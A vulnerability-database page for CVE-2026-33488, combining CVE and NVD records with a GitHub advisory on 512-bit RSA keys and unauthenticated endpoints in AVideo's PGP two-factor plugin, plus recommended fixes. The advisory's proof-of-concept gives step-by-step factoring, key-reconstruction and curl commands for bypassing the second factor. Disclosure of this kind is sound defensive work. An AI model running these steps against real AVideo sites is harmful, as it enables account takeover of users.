Vulnerability-Lookup

CVE-2026-33488 (GCVE-0-2026-33488)

Vulnerability from cvelistv5 – Published: 2026-03-23 15:23 – Updated: 2026-03-24 15:13

Title

AVideo has a PGP 2FA Bypass via Cryptographically Broken 512-bit RSA Key Generation in LoginControl Plugin

Summary

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `createKeys()` function in the LoginControl plugin's PGP 2FA system generates 512-bit RSA keys, which have been publicly factorable since 1999. An attacker who obtains a target user's public key can factor the 512-bit RSA modulus on commodity hardware in hours, derive the complete private key, and decrypt any PGP 2FA challenge issued by the system — completely bypassing the second authentication factor. Additionally, the `generateKeys.json.php` and `encryptMessage.json.php` endpoints lack any authentication checks, exposing CPU-intensive key generation to anonymous users. Commit 00d979d87f8182095c8150609153a43f834e351e contains a patch.

Severity ?

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE

CWE-326 - Inadequate Encryption Strength

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/00d979d87f8…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33488",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-24T15:00:16.495353Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-24T15:13:58.214Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `createKeys()` function in the LoginControl plugin\u0027s PGP 2FA system generates 512-bit RSA keys, which have been publicly factorable since 1999. An attacker who obtains a target user\u0027s public key can factor the 512-bit RSA modulus on commodity hardware in hours, derive the complete private key, and decrypt any PGP 2FA challenge issued by the system \u2014 completely bypassing the second authentication factor. Additionally, the `generateKeys.json.php` and `encryptMessage.json.php` endpoints lack any authentication checks, exposing CPU-intensive key generation to anonymous users. Commit 00d979d87f8182095c8150609153a43f834e351e contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-326",
              "description": "CWE-326: Inadequate Encryption Strength",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-23T15:23:01.438Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/00d979d87f8182095c8150609153a43f834e351e",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/00d979d87f8182095c8150609153a43f834e351e"
        }
      ],
      "source": {
        "advisory": "GHSA-6m5f-j7w2-w953",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo has a PGP 2FA Bypass via Cryptographically Broken 512-bit RSA Key Generation in LoginControl Plugin"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33488",
    "datePublished": "2026-03-23T15:23:01.438Z",
    "dateReserved": "2026-03-20T16:16:48.971Z",
    "dateUpdated": "2026-03-24T15:13:58.214Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33488",
      "date": "2026-04-22",
      "epss": "0.00028",
      "percentile": "0.08117"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33488\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-23T16:16:49.103\",\"lastModified\":\"2026-03-24T17:49:58.183\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `createKeys()` function in the LoginControl plugin\u0027s PGP 2FA system generates 512-bit RSA keys, which have been publicly factorable since 1999. An attacker who obtains a target user\u0027s public key can factor the 512-bit RSA modulus on commodity hardware in hours, derive the complete private key, and decrypt any PGP 2FA challenge issued by the system \u2014 completely bypassing the second authentication factor. Additionally, the `generateKeys.json.php` and `encryptMessage.json.php` endpoints lack any authentication checks, exposing CPU-intensive key generation to anonymous users. Commit 00d979d87f8182095c8150609153a43f834e351e contains a patch.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, la funci\u00f3n `createKeys()` en el sistema PGP 2FA del plugin LoginControl genera claves RSA de 512 bits, que han sido factorizables p\u00fablicamente desde 1999. Un atacante que obtiene la clave p\u00fablica de un usuario objetivo puede factorizar el m\u00f3dulo RSA de 512 bits en hardware comercial en horas, derivar la clave privada completa y descifrar cualquier desaf\u00edo PGP 2FA emitido por el sistema \u2014 eludiendo completamente el segundo factor de autenticaci\u00f3n. Adem\u00e1s, los endpoints `generateKeys.json.php` y `encryptMessage.json.php` carecen de cualquier verificaci\u00f3n de autenticaci\u00f3n, exponiendo la generaci\u00f3n de claves que consume mucha CPU a usuarios an\u00f3nimos. El commit 00d979d87f8182095c8150609153a43f834e351e contiene un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":7.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.2,\"impactScore\":5.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-326\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"26.0\",\"matchCriteriaId\":\"774C24F1-9D26-484F-B931-1DA107C8F588\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/00d979d87f8182095c8150609153a43f834e351e\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33488\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T15:00:16.495353Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T15:00:26.341Z\"}}], \"cna\": {\"title\": \"AVideo has a PGP 2FA Bypass via Cryptographically Broken 512-bit RSA Key Generation in LoginControl Plugin\", \"source\": {\"advisory\": \"GHSA-6m5f-j7w2-w953\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/00d979d87f8182095c8150609153a43f834e351e\", \"name\": \"https://github.com/WWBN/AVideo/commit/00d979d87f8182095c8150609153a43f834e351e\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `createKeys()` function in the LoginControl plugin\u0027s PGP 2FA system generates 512-bit RSA keys, which have been publicly factorable since 1999. An attacker who obtains a target user\u0027s public key can factor the 512-bit RSA modulus on commodity hardware in hours, derive the complete private key, and decrypt any PGP 2FA challenge issued by the system \\u2014 completely bypassing the second authentication factor. Additionally, the `generateKeys.json.php` and `encryptMessage.json.php` endpoints lack any authentication checks, exposing CPU-intensive key generation to anonymous users. Commit 00d979d87f8182095c8150609153a43f834e351e contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-326\", \"description\": \"CWE-326: Inadequate Encryption Strength\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-23T15:23:01.438Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33488\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T15:13:58.214Z\", \"dateReserved\": \"2026-03-20T16:16:48.971Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-23T15:23:01.438Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33488

Vulnerability from fkie_nvd - Published: 2026-03-23 16:16 - Updated: 2026-03-24 17:49

Severity ?

7.4 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/WWBN/AVideo/commit/00d979d87f8182095c8150609153a43f834e351e	Patch
security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588",
              "versionEndIncluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `createKeys()` function in the LoginControl plugin\u0027s PGP 2FA system generates 512-bit RSA keys, which have been publicly factorable since 1999. An attacker who obtains a target user\u0027s public key can factor the 512-bit RSA modulus on commodity hardware in hours, derive the complete private key, and decrypt any PGP 2FA challenge issued by the system \u2014 completely bypassing the second authentication factor. Additionally, the `generateKeys.json.php` and `encryptMessage.json.php` endpoints lack any authentication checks, exposing CPU-intensive key generation to anonymous users. Commit 00d979d87f8182095c8150609153a43f834e351e contains a patch."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, la funci\u00f3n `createKeys()` en el sistema PGP 2FA del plugin LoginControl genera claves RSA de 512 bits, que han sido factorizables p\u00fablicamente desde 1999. Un atacante que obtiene la clave p\u00fablica de un usuario objetivo puede factorizar el m\u00f3dulo RSA de 512 bits en hardware comercial en horas, derivar la clave privada completa y descifrar cualquier desaf\u00edo PGP 2FA emitido por el sistema \u2014 eludiendo completamente el segundo factor de autenticaci\u00f3n. Adem\u00e1s, los endpoints `generateKeys.json.php` y `encryptMessage.json.php` carecen de cualquier verificaci\u00f3n de autenticaci\u00f3n, exponiendo la generaci\u00f3n de claves que consume mucha CPU a usuarios an\u00f3nimos. El commit 00d979d87f8182095c8150609153a43f834e351e contiene un parche."
    }
  ],
  "id": "CVE-2026-33488",
  "lastModified": "2026-03-24T17:49:58.183",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.4,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-03-23T16:16:49.103",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/00d979d87f8182095c8150609153a43f834e351e"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-6m5f-j7w2-w953"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-326"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-6M5F-J7W2-W953

Vulnerability from github – Published: 2026-03-20 20:49 – Updated: 2026-03-25 20:30

Summary

AVideo has a PGP 2FA Bypass via Cryptographically Broken 512-bit RSA Key Generation in LoginControl Plugin

Details

Summary

The createKeys() function in the LoginControl plugin's PGP 2FA system generates 512-bit RSA keys, which have been publicly factorable since 1999. An attacker who obtains a target user's public key can factor the 512-bit RSA modulus on commodity hardware in hours, derive the complete private key, and decrypt any PGP 2FA challenge issued by the system — completely bypassing the second authentication factor. Additionally, the generateKeys.json.php and encryptMessage.json.php endpoints lack any authentication checks, exposing CPU-intensive key generation to anonymous users.

Details

The vulnerability originates in plugin/LoginControl/pgp/functions.php at line 26:

// plugin/LoginControl/pgp/functions.php:26
$privateKey = RSA::createKey(512);

This code was copied from the singpolyma/openpgp-php library's example/demo code, which was never intended for production use. The entire PGP 2FA flow relies on these weak keys:

Key generation: When a user enables PGP 2FA, the UI calls createKeys() which generates a 512-bit RSA keypair. The public key is saved to the database via savePublicKey.json.php.
Challenge creation (LoginControl.php:520-531): During login, a uniqid() token is generated, stored in the session, and encrypted with the user's stored public key:

// LoginControl.php:525-530
$_SESSION['user']['challenge']['text'] = uniqid();
$encMessage = self::encryptPGPMessage(User::getId(), $_SESSION['user']['challenge']['text']);

Challenge verification (LoginControl.php:533-539): The user must decrypt the challenge and submit the plaintext. Verification is a simple equality check:

// LoginControl.php:534
if ($response == $_SESSION['user']['challenge']['text']) {

Since 512-bit RSA was publicly factored in 1999 (RSA-155 challenge), an attacker who obtains the public key can factor the modulus using freely available tools (CADO-NFS, msieve, yafu) in a matter of hours on modern hardware, reconstruct the complete private key from the prime factors, and decrypt any challenge encrypted with that key.

Unauthenticated endpoints (compounding issue):

generateKeys.json.php does not include configuration.php and has no authentication check:

// plugin/LoginControl/pgp/generateKeys.json.php:1-2
<?php
require_once  '../../../plugin/LoginControl/pgp/functions.php';

Similarly, encryptMessage.json.php has no authentication. Both are accessible to anonymous users, enabling abuse of CPU-intensive RSA key generation for denial-of-service.

PoC

Step 1: Obtain the target user's 512-bit public key

The public key must be obtained through a side channel (e.g., the user sharing it per PGP conventions, another vulnerability leaking database contents, or admin access). The key is stored in the users_externalOptions table under the key PGPKey.

Step 2: Extract the RSA modulus from the public key

# Extract the modulus from the PGP public key
echo "$PUBLIC_KEY_ARMOR" | gpg --import 2>/dev/null
gpg --list-keys --with-key-data | grep '^pub'
# Or use Python:
python3 -c "
from Crypto.PublicKey import RSA
# Parse the PGP key and extract RSA modulus N
# N will be a ~155-digit number (512 bits)
print(f'N = {key.n}')
"

Step 3: Factor the 512-bit modulus

# Using CADO-NFS (typically completes in 2-8 hours on a modern desktop)
cado-nfs.py <modulus_decimal>
# Or using msieve:
msieve -v <modulus_decimal>
# Output: p = <factor1>, q = <factor2>

Step 4: Reconstruct the private key and decrypt the 2FA challenge

from Crypto.PublicKey import RSA
from Crypto.Util.number import inverse

# From factoring step
p = <factor1>
q = <factor2>
n = p * q
e = 65537
d = inverse(e, (p-1)*(q-1))

# Reconstruct private key
privkey = RSA.construct((n, e, d, p, q))

# Decrypt the PGP-encrypted challenge from the login page
# and submit the plaintext to verifyChallenge.json.php

Step 5: Submit decrypted challenge to bypass 2FA

curl -b "session_cookie" \
  "https://target/plugin/LoginControl/pgp/verifyChallenge.json.php" \
  -d "response=<decrypted_uniqid_value>"
# Expected: {"error":false,"msg":"","response":"<value>"}

Unauthenticated endpoint abuse:

# No authentication required — CPU-intensive 512-bit RSA keygen
curl "https://target/plugin/LoginControl/pgp/generateKeys.json.php?keyPassword=test&keyName=test&keyEmail=test@test.com"
# Returns: {"error":false,"public":"-----BEGIN PGP PUBLIC KEY BLOCK-----...","private":"-----BEGIN PGP PRIVATE KEY BLOCK-----..."}

Impact

2FA Bypass: Any user who enabled PGP 2FA using the built-in key generator has their second factor effectively nullified. An attacker with knowledge of the password (phishing, credential stuffing, breach reuse) can bypass the 2FA protection entirely.
Account Takeover: Combined with any credential compromise, this enables full account takeover of 2FA-protected accounts.
Denial of Service: The unauthenticated generateKeys.json.php endpoint allows anonymous users to trigger CPU-intensive RSA key generation operations with no rate limiting.
Scope: All users who enabled PGP 2FA using the application's built-in key generator are affected. Users who imported their own externally-generated keys with adequate key sizes (2048+ bits) are not affected by the key weakness, but the unauthenticated endpoints affect all deployments with the LoginControl plugin.

Recommended Fix

1. Increase RSA key size to 2048 bits minimum (plugin/LoginControl/pgp/functions.php:26):

// Before:
$privateKey = RSA::createKey(512);

// After:
$privateKey = RSA::createKey(2048);

2. Add authentication to generateKeys.json.php (match the pattern used in decryptMessage.json.php):

<?php
require_once '../../../videos/configuration.php';
require_once '../../../plugin/LoginControl/pgp/functions.php';
header('Content-Type: application/json');

$obj = new stdClass();
$obj->error = true;

$plugin = AVideoPlugin::loadPluginIfEnabled('LoginControl');

if (!User::isLogged()) {
    $obj->msg = "Authentication required";
    die(json_encode($obj));
}
// ... rest of existing code

3. Add authentication to encryptMessage.json.php (same pattern):

<?php
require_once '../../../videos/configuration.php';
require_once '../../../plugin/LoginControl/pgp/functions.php';
// Add auth check before processing
if (!User::isLogged()) {
    $obj->msg = 'Authentication required';
    die(json_encode($obj));
}

4. Add minimum key size validation in savePublicKey.json.php to reject weak keys regardless of how they were generated:

// After line 26, before saving:
$keyData = OpenPGP_Message::parse(OpenPGP::unarmor($_REQUEST['publicKey'], 'PGP PUBLIC KEY BLOCK'));
if ($keyData && $keyData[0] instanceof OpenPGP_PublicKeyPacket) {
    $bitLength = strlen($keyData[0]->key['n']) * 8;
    if ($bitLength < 2048) {
        $obj->msg = "Key size too small. Minimum 2048 bits required.";
        die(json_encode($obj));
    }
}

Severity ?

7.4 (High)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33488"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-326"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T20:49:06Z",
    "nvd_published_at": "2026-03-23T16:16:49Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `createKeys()` function in the LoginControl plugin\u0027s PGP 2FA system generates 512-bit RSA keys, which have been publicly factorable since 1999. An attacker who obtains a target user\u0027s public key can factor the 512-bit RSA modulus on commodity hardware in hours, derive the complete private key, and decrypt any PGP 2FA challenge issued by the system \u2014 completely bypassing the second authentication factor. Additionally, the `generateKeys.json.php` and `encryptMessage.json.php` endpoints lack any authentication checks, exposing CPU-intensive key generation to anonymous users.\n\n## Details\n\nThe vulnerability originates in `plugin/LoginControl/pgp/functions.php` at line 26:\n\n```php\n// plugin/LoginControl/pgp/functions.php:26\n$privateKey = RSA::createKey(512);\n```\n\nThis code was copied from the `singpolyma/openpgp-php` library\u0027s example/demo code, which was never intended for production use. The entire PGP 2FA flow relies on these weak keys:\n\n1. **Key generation**: When a user enables PGP 2FA, the UI calls `createKeys()` which generates a 512-bit RSA keypair. The public key is saved to the database via `savePublicKey.json.php`.\n\n2. **Challenge creation** (`LoginControl.php:520-531`): During login, a `uniqid()` token is generated, stored in the session, and encrypted with the user\u0027s stored public key:\n```php\n// LoginControl.php:525-530\n$_SESSION[\u0027user\u0027][\u0027challenge\u0027][\u0027text\u0027] = uniqid();\n$encMessage = self::encryptPGPMessage(User::getId(), $_SESSION[\u0027user\u0027][\u0027challenge\u0027][\u0027text\u0027]);\n```\n\n3. **Challenge verification** (`LoginControl.php:533-539`): The user must decrypt the challenge and submit the plaintext. Verification is a simple equality check:\n```php\n// LoginControl.php:534\nif ($response == $_SESSION[\u0027user\u0027][\u0027challenge\u0027][\u0027text\u0027]) {\n```\n\nSince 512-bit RSA was publicly factored in 1999 (RSA-155 challenge), an attacker who obtains the public key can factor the modulus using freely available tools (CADO-NFS, msieve, yafu) in a matter of hours on modern hardware, reconstruct the complete private key from the prime factors, and decrypt any challenge encrypted with that key.\n\n**Unauthenticated endpoints** (compounding issue):\n\n`generateKeys.json.php` does not include `configuration.php` and has no authentication check:\n```php\n// plugin/LoginControl/pgp/generateKeys.json.php:1-2\n\u003c?php\nrequire_once  \u0027../../../plugin/LoginControl/pgp/functions.php\u0027;\n```\n\nSimilarly, `encryptMessage.json.php` has no authentication. Both are accessible to anonymous users, enabling abuse of CPU-intensive RSA key generation for denial-of-service.\n\n## PoC\n\n**Step 1: Obtain the target user\u0027s 512-bit public key**\n\nThe public key must be obtained through a side channel (e.g., the user sharing it per PGP conventions, another vulnerability leaking database contents, or admin access). The key is stored in the `users_externalOptions` table under the key `PGPKey`.\n\n**Step 2: Extract the RSA modulus from the public key**\n\n```bash\n# Extract the modulus from the PGP public key\necho \"$PUBLIC_KEY_ARMOR\" | gpg --import 2\u003e/dev/null\ngpg --list-keys --with-key-data | grep \u0027^pub\u0027\n# Or use Python:\npython3 -c \"\nfrom Crypto.PublicKey import RSA\n# Parse the PGP key and extract RSA modulus N\n# N will be a ~155-digit number (512 bits)\nprint(f\u0027N = {key.n}\u0027)\n\"\n```\n\n**Step 3: Factor the 512-bit modulus**\n\n```bash\n# Using CADO-NFS (typically completes in 2-8 hours on a modern desktop)\ncado-nfs.py \u003cmodulus_decimal\u003e\n# Or using msieve:\nmsieve -v \u003cmodulus_decimal\u003e\n# Output: p = \u003cfactor1\u003e, q = \u003cfactor2\u003e\n```\n\n**Step 4: Reconstruct the private key and decrypt the 2FA challenge**\n\n```python\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Util.number import inverse\n\n# From factoring step\np = \u003cfactor1\u003e\nq = \u003cfactor2\u003e\nn = p * q\ne = 65537\nd = inverse(e, (p-1)*(q-1))\n\n# Reconstruct private key\nprivkey = RSA.construct((n, e, d, p, q))\n\n# Decrypt the PGP-encrypted challenge from the login page\n# and submit the plaintext to verifyChallenge.json.php\n```\n\n**Step 5: Submit decrypted challenge to bypass 2FA**\n\n```bash\ncurl -b \"session_cookie\" \\\n  \"https://target/plugin/LoginControl/pgp/verifyChallenge.json.php\" \\\n  -d \"response=\u003cdecrypted_uniqid_value\u003e\"\n# Expected: {\"error\":false,\"msg\":\"\",\"response\":\"\u003cvalue\u003e\"}\n```\n\n**Unauthenticated endpoint abuse:**\n\n```bash\n# No authentication required \u2014 CPU-intensive 512-bit RSA keygen\ncurl \"https://target/plugin/LoginControl/pgp/generateKeys.json.php?keyPassword=test\u0026keyName=test\u0026keyEmail=test@test.com\"\n# Returns: {\"error\":false,\"public\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----...\",\"private\":\"-----BEGIN PGP PRIVATE KEY BLOCK-----...\"}\n```\n\n## Impact\n\n- **2FA Bypass**: Any user who enabled PGP 2FA using the built-in key generator has their second factor effectively nullified. An attacker with knowledge of the password (phishing, credential stuffing, breach reuse) can bypass the 2FA protection entirely.\n- **Account Takeover**: Combined with any credential compromise, this enables full account takeover of 2FA-protected accounts.\n- **Denial of Service**: The unauthenticated `generateKeys.json.php` endpoint allows anonymous users to trigger CPU-intensive RSA key generation operations with no rate limiting.\n- **Scope**: All users who enabled PGP 2FA using the application\u0027s built-in key generator are affected. Users who imported their own externally-generated keys with adequate key sizes (2048+ bits) are not affected by the key weakness, but the unauthenticated endpoints affect all deployments with the LoginControl plugin.\n\n## Recommended Fix\n\n**1. Increase RSA key size to 2048 bits minimum** (`plugin/LoginControl/pgp/functions.php:26`):\n\n```php\n// Before:\n$privateKey = RSA::createKey(512);\n\n// After:\n$privateKey = RSA::createKey(2048);\n```\n\n**2. Add authentication to `generateKeys.json.php`** (match the pattern used in `decryptMessage.json.php`):\n\n```php\n\u003c?php\nrequire_once 